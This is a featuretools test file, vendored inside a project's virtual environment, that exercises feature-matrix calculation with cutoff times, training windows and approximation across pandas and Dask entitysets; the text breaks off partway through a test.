df28f85be537c8266444d40894f27b6cfcba3cb7
|
0037db6f3708456cb4492d98b174d37a8fc4ee15
|
/venv/Lib/site-packages/featuretools/tests/computational_backend/test_calculate_feature_matrix.py
|
8d4749bfde4627585e59bf1ab63b93da66f02a9d
|
[] |
no_license
|
cpantin/MTG_CardEval
|
2005729c81760849e3e58afe6c1ce36197b36f4d
|
ceb846dbdd39cd98c11d125095842721a93b58c3
|
refs/heads/master
| 2023-06-21T03:51:55.767612
| 2021-07-23T20:09:43
| 2021-07-23T20:09:43
| 388,156,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89,675
|
py
|
import logging
import os
import re
import shutil
from datetime import datetime
from itertools import combinations
from random import randint
import numpy as np
import pandas as pd
import psutil
import pytest
from dask import dataframe as dd
from distributed.utils_test import cluster
from tqdm import tqdm
import featuretools as ft
from featuretools import EntitySet, Timedelta, calculate_feature_matrix, dfs
from featuretools.computational_backends import utils
from featuretools.computational_backends.calculate_feature_matrix import (
FEATURE_CALCULATION_PERCENTAGE,
_chunk_dataframe_groups,
_handle_chunk_size,
scatter_warning
)
from featuretools.computational_backends.utils import (
bin_cutoff_times,
create_client_and_cluster,
n_jobs_to_workers
)
from featuretools.feature_base import (
AggregationFeature,
DirectFeature,
IdentityFeature
)
from featuretools.primitives import (
Count,
Max,
Min,
Percentile,
Sum,
TransformPrimitive
)
from featuretools.tests.testing_utils import (
backward_path,
get_mock_client_cluster,
to_pandas
)
from featuretools.utils.gen_utils import Library
def test_scatter_warning(caplog):
logger = logging.getLogger('featuretools')
match = "EntitySet was only scattered to {} out of {} workers"
warning_message = match.format(1, 2)
logger.propagate = True
scatter_warning(1, 2)
logger.propagate = False
assert warning_message in caplog.text
# TODO: final assert fails w/ Dask
def test_calc_feature_matrix(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed dataframe result not ordered')
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times, es['log'].index: instances})
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
verbose=True)
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
error_text = 'features must be a non-empty list of features'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix('features', es, cutoff_time=cutoff_time)
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([], es, cutoff_time=cutoff_time)
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([1, 2, 3], es, cutoff_time=cutoff_time)
error_text = "cutoff_time times must be datetime type: try casting via "\
"pd\\.to_datetime\\(\\)"
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
instance_ids=range(17),
cutoff_time=17)
error_text = 'cutoff_time must be a single value or DataFrame'
with pytest.raises(TypeError, match=error_text):
calculate_feature_matrix([property_feature],
es,
instance_ids=range(17),
cutoff_time=times)
cutoff_times_dup = pd.DataFrame({'time': [datetime(2018, 3, 1),
datetime(2018, 3, 1)],
es['log'].index: [1, 1]})
error_text = 'Duplicated rows in cutoff time dataframe.'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([property_feature],
entityset=es,
cutoff_time=cutoff_times_dup)
cutoff_reordered = cutoff_time.iloc[[-1, 10, 1]] # 3 ids not ordered by cutoff time
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_reordered,
verbose=True)
assert all(feature_matrix.index == cutoff_reordered["id"].values)
# fails with Dask and Koalas entitysets: the cutoff time is not reordered, so out-of-order input cannot be verified
# - can't tell if results are wrong or merely different; all values are False, so a positional check is impossible
def test_cfm_warns_dask_cutoff_time(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times,
es['log'].index: instances})
cutoff_time = dd.from_pandas(cutoff_time, npartitions=4)
property_feature = ft.Feature(es['log']['value']) > 10
match = "cutoff_time should be a Pandas DataFrame: " \
"computing cutoff_time, this may take a while"
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
def test_cfm_compose(es, lt):
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=lt,
verbose=True)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] ==
feature_matrix['label_func']).values.all()
def test_cfm_compose_approximate(es, lt):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('dask does not support approximate')
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=lt,
approximate='1s',
verbose=True)
assert(type(feature_matrix) == pd.core.frame.DataFrame)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] ==
feature_matrix['label_func']).values.all()
def test_cfm_dask_compose(dask_es, lt):
property_feature = ft.Feature(dask_es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
dask_es,
cutoff_time=lt,
verbose=True)
feature_matrix = feature_matrix.compute()
assert (feature_matrix[property_feature.get_name()] == feature_matrix['label_func']).values.all()
# tests approximate, skip for dask/koalas
def test_cfm_approximate_correct_ordering():
trips = {
'trip_id': [i for i in range(1000)],
'flight_time': [datetime(1998, 4, 2) for i in range(350)] + [datetime(1997, 4, 3) for i in range(650)],
'flight_id': [randint(1, 25) for i in range(1000)],
'trip_duration': [randint(1, 999) for i in range(1000)]
}
df = pd.DataFrame.from_dict(trips)
es = EntitySet('flights')
es.entity_from_dataframe("trips",
dataframe=df,
index="trip_id",
time_index='flight_time')
es.normalize_entity(base_entity_id="trips",
new_entity_id="flights",
index="flight_id",
make_time_index=True)
features = dfs(entityset=es, target_entity='trips', features_only=True)
flight_features = [feature for feature in features
if isinstance(feature, DirectFeature) and
isinstance(feature.base_features[0],
AggregationFeature)]
property_feature = IdentityFeature(es['trips']['trip_id'])
cutoff_time = pd.DataFrame.from_dict({'instance_id': df['trip_id'],
'time': df['flight_time']})
time_feature = IdentityFeature(es['trips']['flight_time'])
feature_matrix = calculate_feature_matrix(flight_features + [property_feature, time_feature],
es,
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
feature_matrix.index.names = ['instance', 'time']
assert(np.all(feature_matrix.reset_index('time').reset_index()[['instance', 'time']].values == feature_matrix[['trip_id', 'flight_time']].values))
feature_matrix_2 = calculate_feature_matrix(flight_features + [property_feature, time_feature],
es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
approximate=Timedelta(2, 'd'))
feature_matrix_2.index.names = ['instance', 'time']
assert(np.all(feature_matrix_2.reset_index('time').reset_index()[['instance', 'time']].values == feature_matrix_2[['trip_id', 'flight_time']].values))
for column in feature_matrix:
for x, y in zip(feature_matrix[column], feature_matrix_2[column]):
assert ((pd.isnull(x) and pd.isnull(y)) or (x == y))
# uses approximate, skip for dask/koalas entitysets
def test_cfm_no_cutoff_time_index(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat4 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat4, pd_es['sessions'])
cutoff_time = pd.DataFrame({
'time': [datetime(2013, 4, 9, 10, 31, 19), datetime(2013, 4, 9, 11, 0, 0)],
'instance_id': [0, 2]
})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
cutoff_time_in_index=False,
approximate=Timedelta(12, 's'),
cutoff_time=cutoff_time)
assert feature_matrix.index.name == 'id'
assert feature_matrix.index.values.tolist() == [0, 2]
assert feature_matrix[dfeat.get_name()].tolist() == [10, 10]
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
cutoff_time = pd.DataFrame({
'time': [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)],
'instance_id': [0, 2]
})
feature_matrix_2 = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
cutoff_time_in_index=False,
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix_2.index.name == 'id'
assert feature_matrix_2.index.tolist() == [0, 2]
assert feature_matrix_2[dfeat.get_name()].tolist() == [7, 10]
assert feature_matrix_2[agg_feat.get_name()].tolist() == [5, 1]
# TODO: fails with dask entitysets
# TODO: fails with koalas entitysets
def test_cfm_duplicated_index_in_cutoff_time(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed results not ordered, missing duplicates')
times = [datetime(2011, 4, 1), datetime(2011, 5, 1),
datetime(2011, 4, 1), datetime(2011, 5, 1)]
instances = [1, 1, 2, 2]
property_feature = ft.Feature(es['log']['value']) > 10
cutoff_time = pd.DataFrame({'id': instances, 'time': times},
index=[1, 1, 1, 1])
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
chunk_size=1)
assert (feature_matrix.shape[0] == cutoff_time.shape[0])
# TODO: fails with Dask, Koalas
def test_saveprogress(es, tmpdir):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('saveprogress fails with distributed entitysets')
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
cutoff_time = pd.DataFrame({'time': times, 'instance_id': range(17)})
property_feature = ft.Feature(es['log']['value']) > 10
save_progress = str(tmpdir)
fm_save = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
save_progress=save_progress)
_, _, files = next(os.walk(save_progress))
files = [os.path.join(save_progress, file) for file in files]
# there are 17 datetime files created above
assert len(files) == 17
list_df = []
for file_ in files:
df = pd.read_csv(file_, index_col="id", header=0)
list_df.append(df)
merged_df = pd.concat(list_df)
merged_df.set_index(pd.DatetimeIndex(times), inplace=True, append=True)
fm_no_save = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
assert np.all((merged_df.sort_index().values) == (fm_save.sort_index().values))
assert np.all((fm_no_save.sort_index().values) == (fm_save.sort_index().values))
assert np.all((fm_no_save.sort_index().values) == (merged_df.sort_index().values))
shutil.rmtree(save_progress)
def test_cutoff_time_correctly(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 1, 2]})
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
labels = [10, 5, 0]
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_cutoff_time_binning():
cutoff_time = pd.DataFrame({
'time': [
datetime(2011, 4, 9, 12, 31),
datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10, 1)
],
'instance_id': [1, 2, 3]
})
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(4, 'h'))
labels = [datetime(2011, 4, 9, 12),
datetime(2011, 4, 10, 8),
datetime(2011, 4, 10, 12)]
for i in binned_cutoff_times.index:
assert binned_cutoff_times['time'][i] == labels[i]
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(25, 'h'))
labels = [datetime(2011, 4, 8, 22),
datetime(2011, 4, 9, 23),
datetime(2011, 4, 9, 23)]
for i in binned_cutoff_times.index:
assert binned_cutoff_times['time'][i] == labels[i]
error_text = "Unit is relative"
with pytest.raises(ValueError, match=error_text):
binned_cutoff_times = bin_cutoff_times(cutoff_time, Timedelta(1, 'mo'))
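# Note (added for clarity, not part of the upstream test): bin_cutoff_times
# rounds each cutoff down to the start of its Timedelta-sized bin, so with
# 4-hour bins 12:31 maps to 12:00, and relative units such as "mo" are
# rejected because the bin width must be an absolute duration.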
def test_training_window_fails_dask(dask_es):
property_feature = ft.Feature(dask_es['log']['id'],
parent_entity=dask_es['customers'],
primitive=Count)
error_text = "Using training_window is not supported with Dask Entities"
with pytest.raises(ValueError, match=error_text):
calculate_feature_matrix([property_feature],
dask_es,
training_window='2 hours')
def test_cutoff_time_columns_order(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
id_col_names = ['instance_id', es['customers'].index]
time_col_names = ['time', es['customers'].time_index]
for id_col in id_col_names:
for time_col in time_col_names:
cutoff_time = pd.DataFrame({'dummy_col_1': [1, 2, 3],
id_col: [0, 1, 2],
'dummy_col_2': [True, False, False],
time_col: times})
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
labels = [10, 5, 0]
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_cutoff_time_df_redundant_column_names(es):
property_feature = ft.Feature(es['log']['id'], parent_entity=es['customers'], primitive=Count)
times = [datetime(2011, 4, 10), datetime(2011, 4, 11), datetime(2011, 4, 7)]
cutoff_time = pd.DataFrame({es['customers'].index: [0, 1, 2],
'instance_id': [0, 1, 2],
'dummy_col': [True, False, False],
'time': times})
err_msg = 'Cutoff time DataFrame cannot contain both a column named "instance_id" and a column' \
' with the same name as the target entity index'
with pytest.raises(AttributeError, match=err_msg):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
cutoff_time = pd.DataFrame({es['customers'].time_index: [0, 1, 2],
'instance_id': [0, 1, 2],
'dummy_col': [True, False, False],
'time': times})
err_msg = 'Cutoff time DataFrame cannot contain both a column named "time" and a column' \
' with the same name as the target entity time index'
with pytest.raises(AttributeError, match=err_msg):
calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time)
def test_training_window(pd_es):
property_feature = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
top_level_agg = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
    # make sure we test features that have a direct feature to a higher-level agg,
    # so we get multiple "filter eids" in get_pandas_data_slice
    # and go through the loop that pulls data with a training_window param more than once
dagg = DirectFeature(top_level_agg, pd_es['customers'])
# for now, warns if last_time_index not present
times = [datetime(2011, 4, 9, 12, 31),
datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 1, 2]})
warn_text = "Using training_window but last_time_index is not set on entity customers"
with pytest.warns(UserWarning, match=warn_text):
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours')
pd_es.add_last_time_indexes()
error_text = 'Training window cannot be in observations'
with pytest.raises(AssertionError, match=error_text):
feature_matrix = calculate_feature_matrix([property_feature],
pd_es,
cutoff_time=cutoff_time,
training_window=Timedelta(2, 'observations'))
# Case1. include_cutoff_time = True
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=True)
prop_values = [4, 5, 1]
dagg_values = [3, 2, 1]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case2. include_cutoff_time = False
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=False)
prop_values = [5, 5, 2]
dagg_values = [3, 2, 1]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case3. include_cutoff_time = False with single cutoff time value
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=pd.to_datetime("2011-04-09 10:40:00"),
training_window='9 minutes',
include_cutoff_time=False)
prop_values = [0, 4, 0]
dagg_values = [3, 3, 3]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case4. include_cutoff_time = True with single cutoff time value
feature_matrix = calculate_feature_matrix([property_feature, dagg],
pd_es,
cutoff_time=pd.to_datetime("2011-04-10 10:40:00"),
training_window='2 days',
include_cutoff_time=True)
prop_values = [0, 10, 1]
dagg_values = [3, 3, 3]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
def test_training_window_overlap(pd_es):
pd_es.add_last_time_indexes()
count_log = ft.Feature(
base=pd_es['log']['id'],
parent_entity=pd_es['customers'],
primitive=Count,
)
cutoff_time = pd.DataFrame({
'id': [0, 0],
'time': ['2011-04-09 10:30:00', '2011-04-09 10:40:00'],
}).astype({'time': 'datetime64[ns]'})
# Case1. include_cutoff_time = True
actual = calculate_feature_matrix(
features=[count_log],
entityset=pd_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
training_window='10 minutes',
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [1, 9])
# Case2. include_cutoff_time = False
actual = calculate_feature_matrix(
features=[count_log],
entityset=pd_es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
training_window='10 minutes',
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [0, 9])
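# Note (added for clarity, not part of the upstream test): include_cutoff_time
# toggles whether rows stamped exactly at the cutoff are visible, which is why
# the first window above counts 1 event when the boundary is inclusive and 0
# when it is exclusive.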
def test_include_cutoff_time_without_training_window(es):
es.add_last_time_indexes()
count_log = ft.Feature(
base=es['log']['id'],
parent_entity=es['customers'],
primitive=Count,
)
cutoff_time = pd.DataFrame({
'id': [0, 0],
'time': ['2011-04-09 10:30:00', '2011-04-09 10:31:00'],
}).astype({'time': 'datetime64[ns]'})
# Case1. include_cutoff_time = True
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [1, 6])
# Case2. include_cutoff_time = False
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=cutoff_time,
cutoff_time_in_index=True,
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [0, 5])
# Case3. include_cutoff_time = True with single cutoff time value
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:00"),
instance_ids=[0],
cutoff_time_in_index=True,
include_cutoff_time=True,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [6])
# Case4. include_cutoff_time = False with single cutoff time value
actual = calculate_feature_matrix(
features=[count_log],
entityset=es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:00"),
instance_ids=[0],
cutoff_time_in_index=True,
include_cutoff_time=False,
)['COUNT(log)']
np.testing.assert_array_equal(actual.values, [5])
def test_approximate_dfeat_of_agg_on_target_include_cutoff_time(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
cutoff_time = pd.DataFrame({'time': [datetime(2011, 4, 9, 10, 31, 19)], 'instance_id': [0]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat2, agg_feat],
pd_es,
approximate=Timedelta(20, 's'),
cutoff_time=cutoff_time,
include_cutoff_time=False)
# binned cutoff_time will be datetime(2011, 4, 9, 10, 31, 0) and
# log event 5 at datetime(2011, 4, 9, 10, 31, 0) will be
# excluded due to approximate cutoff time point
assert feature_matrix[dfeat.get_name()].tolist() == [5]
assert feature_matrix[agg_feat.get_name()].tolist() == [5]
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(20, 's'),
cutoff_time=cutoff_time,
include_cutoff_time=True)
# binned cutoff_time will be datetime(2011, 4, 9, 10, 31, 0) and
# log event 5 at datetime(2011, 4, 9, 10, 31, 0) will be
# included due to approximate cutoff time point
assert feature_matrix[dfeat.get_name()].tolist() == [6]
assert feature_matrix[agg_feat.get_name()].tolist() == [5]
def test_training_window_recent_time_index(pd_es):
# customer with no sessions
row = {
'id': [3],
'age': [73],
u'région_id': ['United States'],
'cohort': [1],
'cancel_reason': ["Lost interest"],
'loves_ice_cream': [True],
'favorite_quote': ["Don't look back. Something might be gaining on you."],
'signup_date': [datetime(2011, 4, 10)],
'upgrade_date': [datetime(2011, 4, 12)],
'cancel_date': [datetime(2011, 5, 13)],
'date_of_birth': [datetime(1938, 2, 1)],
'engagement_level': [2],
}
to_add_df = pd.DataFrame(row)
to_add_df.index = range(3, 4)
# have to convert category to int in order to concat
old_df = pd_es['customers'].df
old_df.index = old_df.index.astype("int")
old_df["id"] = old_df["id"].astype(int)
df = pd.concat([old_df, to_add_df], sort=True)
# convert back after
df.index = df.index.astype("category")
df["id"] = df["id"].astype("category")
pd_es['customers'].update_data(df=df, recalculate_last_time_indexes=False)
pd_es.add_last_time_indexes()
property_feature = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['customers'], primitive=Count)
top_level_agg = ft.Feature(pd_es['customers']['id'], parent_entity=pd_es[u'régions'], primitive=Count)
dagg = DirectFeature(top_level_agg, pd_es['customers'])
instance_ids = [0, 1, 2, 3]
times = [datetime(2011, 4, 9, 12, 31), datetime(2011, 4, 10, 11),
datetime(2011, 4, 10, 13, 10, 1), datetime(2011, 4, 10, 1, 59, 59)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': instance_ids})
# Case1. include_cutoff_time = True
feature_matrix = calculate_feature_matrix(
[property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=True,
)
prop_values = [4, 5, 1, 0]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
dagg_values = [3, 2, 1, 3]
feature_matrix.sort_index(inplace=True)
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# Case2. include_cutoff_time = False
feature_matrix = calculate_feature_matrix(
[property_feature, dagg],
pd_es,
cutoff_time=cutoff_time,
training_window='2 hours',
include_cutoff_time=False,
)
prop_values = [5, 5, 1, 0]
assert (feature_matrix[property_feature.get_name()] == prop_values).values.all()
dagg_values = [3, 2, 1, 3]
feature_matrix.sort_index(inplace=True)
assert (feature_matrix[dagg.get_name()] == dagg_values).values.all()
# TODO: add test to fail w/ koalas
def test_approximate_fails_dask(dask_es):
agg_feat = ft.Feature(dask_es['log']['id'],
parent_entity=dask_es['sessions'],
primitive=Count)
error_text = "Using approximate is not supported with Dask Entities"
with pytest.raises(ValueError, match=error_text):
calculate_feature_matrix([agg_feat],
dask_es,
approximate=Timedelta(1, 'week'))
def test_approximate_multiple_instances_per_cutoff_time(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(1, 'week'),
cutoff_time=cutoff_time)
assert feature_matrix.shape[0] == 2
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approximate_with_multiple_paths(pd_diamond_es):
pd_es = pd_diamond_es
path = backward_path(pd_es, ['regions', 'customers', 'transactions'])
agg_feat = ft.AggregationFeature(pd_es['transactions']['id'],
parent_entity=pd_es['regions'],
relationship_path=path,
primitive=Count)
dfeat = DirectFeature(agg_feat, pd_es['customers'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat],
pd_es,
approximate=Timedelta(1, 'week'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [6, 2]
def test_approximate_dfeat_of_agg_on_target(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
instance_ids=[0, 2],
approximate=Timedelta(10, 's'),
cutoff_time=cutoff_time)
assert feature_matrix[dfeat.get_name()].tolist() == [7, 10]
assert feature_matrix[agg_feat.get_name()].tolist() == [5, 1]
def test_approximate_dfeat_of_need_all_values(pd_es):
p = ft.Feature(pd_es['log']['value'], primitive=Percentile)
agg_feat = ft.Feature(p, parent_entity=pd_es['sessions'], primitive=Sum)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
feature_matrix = calculate_feature_matrix([dfeat, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
log_df = pd_es['log'].df
instances = [0, 2]
cutoffs = [pd.Timestamp('2011-04-09 10:31:19'), pd.Timestamp('2011-04-09 11:00:00')]
approxes = [pd.Timestamp('2011-04-09 10:31:10'), pd.Timestamp('2011-04-09 11:00:00')]
true_vals = []
true_vals_approx = []
for instance, cutoff, approx in zip(instances, cutoffs, approxes):
log_data_cutoff = log_df[log_df['datetime'] < cutoff]
log_data_cutoff['percentile'] = log_data_cutoff['value'].rank(pct=True)
true_agg = log_data_cutoff.loc[log_data_cutoff['session_id'] == instance, 'percentile'].fillna(0).sum()
true_vals.append(round(true_agg, 3))
log_data_approx = log_df[log_df['datetime'] < approx]
log_data_approx['percentile'] = log_data_approx['value'].rank(pct=True)
true_agg_approx = log_data_approx.loc[log_data_approx['session_id'].isin([0, 1, 2]), 'percentile'].fillna(0).sum()
true_vals_approx.append(round(true_agg_approx, 3))
lapprox = [round(x, 3) for x in feature_matrix[dfeat.get_name()].tolist()]
test_list = [round(x, 3) for x in feature_matrix[agg_feat.get_name()].tolist()]
assert lapprox == true_vals_approx
assert test_list == true_vals
def test_uses_full_entity_feat_of_approximate(pd_es):
agg_feat = ft.Feature(pd_es['log']['value'], parent_entity=pd_es['sessions'], primitive=Sum)
agg_feat2 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Sum)
agg_feat3 = ft.Feature(agg_feat, parent_entity=pd_es['customers'], primitive=Max)
dfeat = DirectFeature(agg_feat2, pd_es['sessions'])
dfeat2 = DirectFeature(agg_feat3, pd_es['sessions'])
p = ft.Feature(dfeat, primitive=Percentile)
times = [datetime(2011, 4, 9, 10, 31, 19), datetime(2011, 4, 9, 11, 0, 0)]
cutoff_time = pd.DataFrame({'time': times, 'instance_id': [0, 2]})
# only dfeat2 should be approximated
# because Percentile needs all values
feature_matrix_only_dfeat2 = calculate_feature_matrix(
[dfeat2],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
assert feature_matrix_only_dfeat2[dfeat2.get_name()].tolist() == [50, 50]
feature_matrix_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
approximate=Timedelta(10, 's'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
assert feature_matrix_only_dfeat2[dfeat2.get_name()].tolist() == feature_matrix_approx[dfeat2.get_name()].tolist()
feature_matrix_small_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
approximate=Timedelta(10, 'ms'),
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
feature_matrix_no_approx = calculate_feature_matrix(
[p, dfeat, dfeat2, agg_feat],
pd_es,
cutoff_time_in_index=True,
cutoff_time=cutoff_time)
for f in [p, dfeat, agg_feat]:
for fm1, fm2 in combinations([feature_matrix_approx,
feature_matrix_small_approx,
feature_matrix_no_approx], 2):
assert fm1[f.get_name()].tolist() == fm2[f.get_name()].tolist()
def test_approximate_dfeat_of_dfeat_of_agg_on_target(pd_es):
agg_feat = ft.Feature(pd_es['log']['id'], parent_entity=pd_es['sessions'], primitive=Count)
